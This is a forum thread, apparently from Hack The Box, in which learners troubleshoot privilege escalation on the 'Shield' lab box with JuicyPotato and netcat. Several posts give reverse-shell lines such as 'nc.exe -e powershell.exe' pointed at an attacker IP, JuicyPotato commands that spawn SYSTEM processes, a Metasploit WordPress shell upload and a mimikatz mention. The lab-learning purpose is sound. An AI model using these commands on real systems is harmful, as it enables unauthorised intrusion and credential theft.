Starting Point: Shield, JuicyPotato and netcat

Good time of the day, everyone!
As you may have already figured, I am new here, just starting out on my hacking journey. Techncally I would like to ask two questions, but they are interlinked.

I am a bit stuck at the PrivEsc stage of Shield, specifically the Juicy Potato part. I am working through the walktrhough and currently I have the following open:

1. Msfconsole, which I have used to upload netcat, JuicyPotato and the shell.bat file. It is important to note that I have renamed every one of these files because the box already had them uploaded by someone else, so I decided to use my own copies without interrupting everyone else.
2. A netcat session created by using the wp_admin_shell_upload, on port 6464, which has succesfully worked using my uploaded version of netcat
3. A not-working netcat session on port 6416 because the walkthrough told me to start one.
   In the original walkthrough it’s listed as

nc -lvp 1111

I also tried to change it to 6427 as per contents of my pancake-shell.bat:

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\pancake-nc.exe -e powershell.exe <MY IP> 6427 > pancake-shell.bat

So, I try to execute JuicyPotato as the following:

jp-tasidonya.exe -t * -p C:\intepub\wwwroot\wordpress\wp-content\uploads\pancake-shell.bat -l 6416

The output I get is:

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 6416
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[-] CreateProcessWithTokenW Failed to create proc: 3

[-] CreateProcessAsUser Failed to create proc: 3

No shell gets spawned at ports 6416 or 6427.

I have had some mistakes before where I didn’t change directories on the target machine or didn’t copy files into the right place before, but I have definitely checked that both the pancake-nc.exe and the pancake-shell.bat files are in the uploads directory.

What I am confused about is why do we need an extra port at the end? Which port am I supposed to be listening at, is it the one in the script (6427 in my case) or the one that is specified with a -p flag at the end of the JuicyPotato command (6416 in my case)? The walkthrough has them as different ports, so I assumed that I needed to change all of them. The original JuicyPotato command had -p 1337 at the end, but I do believe I have tried that in my previous attempt to solve this box and it did not succeed. Last time I have also tried appending -c {bb6df56b-cace-11dc-9992-0019b93a3a84} (copied verbatim from the walkthough, I did not think that this token of gobbledygook could change, if it does - I have not tried pasting my token, in which case please someone point me to where I can get my token?)

Questions about this box and this very stage have been asked before, but they do not seem to cover what I’ve got exactly.

• This one seems to have a different JuicyPotato output
• This one is about retrieving the JuicyPotato executable

In summary:

1. What port should I get the admin shell on? Is it the port in the script or the port in the -p flag?
2. Why did the output of the JuicyPotato command fail?

I appreciate you taking the time to read to this part and would be happy to provide further info.

If anyone can tell me how they went about solving that last step with netcat and JuicyPotato I would be really grateful! I am sure it’s a tiny thing that I am missing from the instructions or I have misinterpreted them.

In my experience with juicypotato you often need to try a few different CLSIDs (the long string of random numbers/characters) before you get one that works. It depends which services are currently running, and which OS you’re attacking. There’s a list of all the useful ones here: Windows CLSID | juicy-potato

Having said that, your error messages seem to indicate its failing with error code 3, which means “ERROR_PATH_NOT_FOUND” (I just googled CreateProcessAsUser error code 3 to find that out). Which implies you’re asking it to run an executable that doesn’t exist.

I see you’re passing in just the path to a .bat file as your program you want it to run but I’m not sure you can do that. Try launching command prompt and using the /c argument to specify a command for it to run (in this case the path to your batch file). Read the documentation for juicypotato and you’ll see you can specify arguments with the “-a” option: GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

HTB won’t let me paste this here for some reason so I’ve stuck it on pastebin, but yeah here’s an example of how I’ve used juicypotato before to run netcat. Obviously replace the placeholder text in certain locations (and you can change the port number specified with -l to pretty much anything you want, its only used internally by juicypotato and doesn’t affect you really) : juicypotato.exe -t * -l 1337 -p "C:\Windows\system32\cmd.exe" -a "/c C:\SomeFold - Pastebin.com

@VbScrub thank you very much for taking the time to answer my post! It is definitely something for me to look into as further reading! My problem turned out to be something a lot more trivial, but it’s definitely worth learning more about why the tools listed here work and how they work. The tokens listed make a lot more sense to me now and I wish that the walkthrough also explained it with the same level of detail! I also found the forums a little bit restricting when pasting commands!

I have managed to root it, turns out the walkthrough has been omitting some steps and has a command that leads to an incorrect output (echo command with the forward slashes, which don’t end up in the final file due to the forward slash being the escape sequence). I will post a proper explanation in here soon.

As promised, here’s the full explanation!

In order to try the JuicyPotato step again, I had to get to that step. So I have followed the walkthrough with some alterations:

1. Metasploit step.
   In the walktrhough it asks to change local directory with the lcd command. It also asks to navigate to uploads, which didn’t work for me, so I decided to do it using a relative path instead. It’s easy to overlook, but the exploit puts you in C:\inetpub\wwwroot\wordpress\wp-content\plugins\mdkjhoOtDL instead of uploads

cd ../../uploads

2. PrivEsc step, shell.bat
   The walkthrough asks you to echo the location of the netcat executable, specified as follows: C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe
   If you try and open the generated file using vim or any other editor you’ll see that all the backslashes got eaten! This is because a backslash is an escape character and at the stage where it has been transferred into the file all backslashes have dissappeared! There are two ways to solve it:
   a. Copy-paste the command into the text editor instead of using echo
   b. Or instead of using a single backslash use double! E.g. C:\inetpub\ becomes C:\\inetpub\\. This way you will get the path displayed correctly.

3. Referencing the shell.bat on the remote machine when executing JuicyPotato.
   The walkthrough, again, specifies a full path here. That didn’t work for me. So I remembered that I have uploaded the netcat executable to the same folder as shell.bat, so I have tweaked the command to:

js.exe -t * -p .\shell.bat -l 1337

By the way, the port at the end of there does not get used for anything during this walkthrough. The listener opens on the port that you specify in the shell.bat, in the walkthrough it’s 1111.

This way I had 3 terminals open:

• metasploit
• wwwroot directory that I have opened from metasploit
• admin shell that has been opened from running shell.bat

Also, for the post exploitation step, you’re supposed to run a 64-bit version of mimikatz from the admin shell, it took me some time to figure out!

In summary:

• The admin port should be obtained on port 1111 in the walkthrough (in my case it was port 6427)
• The output of JuicyPotato failed because the path was not specified correctly, see above, so it couldn’t find the right files.

I hope this will help anyone who has been stuck for quite some time!

Thanks for explaining what you did for others sake

Btw if the command worked fine when you changed it to just .\shell.bat then you must have had a typo in your original command. There’s absolutely no reason why you can’t specify a full file path there

EDIT: Yep, in your original command you had “C:\intepub\etc etc” when it should be “C:\inetpub\etc etc”

@VbScrub thank you for noticing it! I often make those typos

@tasidonya thanks so much for this, i was confused as to what i was doing wrong and the lack of explanations in the walkthrough didn’t help, someone seemed in a rush when doing the write up… frustrating

@c0rruptm0nk Glad I could help!

If it makes anyone feel better, I spent 6+ hours trying to figure what I was doing wrong, feeling like a dumbass and it happened to be that I was downloading an empty JuicyPotatoe.exe because my browser was blocking it. CHECK THE FILE SIZE!

Thanks for the post, helped me troubleshoot my issues, not getting anything to connect on the nc1111 portion. Had the same issue with the echo command and then also for some reason my machine wasn’t connecting with 1111, without changing anything else switched that to a different port and got the connection. Great work!

Hi All,

I was able to get a limited shell without using metasploit but couldn’t escalate privileges without looking at the walkthrough. I have a few questions.

1. What are the clues that point to using juicyPotato? i did enumeration but nothing jumped out at me. Searching for “windows server 2016 standard 10” with searchsploit, but the output did not contain anything about juicyPotato (or rottenPotato).

2. Is there a way to escalate privileges without using metasploit?

3. How does juicyPotato work on a high level? I looked at a few online resources but I’m still confused.

Thanks

Type your comment> @theTCP said:

If it makes anyone feel better, I spent 6+ hours trying to figure what I was doing wrong, feeling like a dumbass and it happened to be that I was downloading an empty JuicyPotatoe.exe because my browser was blocking it. CHECK THE FILE SIZE!

hahahaha I’ve been like what the heck man. But I did the same thing! Thanks for posting

can someone take a look at this and tell me where i’ve gone wrong? I’ve been glued to the computer for hours! lol

C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
…
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Thats the last step except I dont get a shell on my listening port

@R4ZZB33RY What port are you listening on?

@tasidonya 5555
thats whats in my .bat file as well

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

Type your comment> @tasidonya said:

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

yeah thats right. I’ll just check back on it.

Thanks

@R4ZZB33RY can you show us the contents of your shell.bat file? Everything else looks fine so I’d suspect something is wrong in that. Either that or you have something blocking the incoming connection on your end (firewall etc). Have you confirmed it works fine if you just run the shell.bat normally from the remote machine rather than trying to run it with js.exe as system?

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.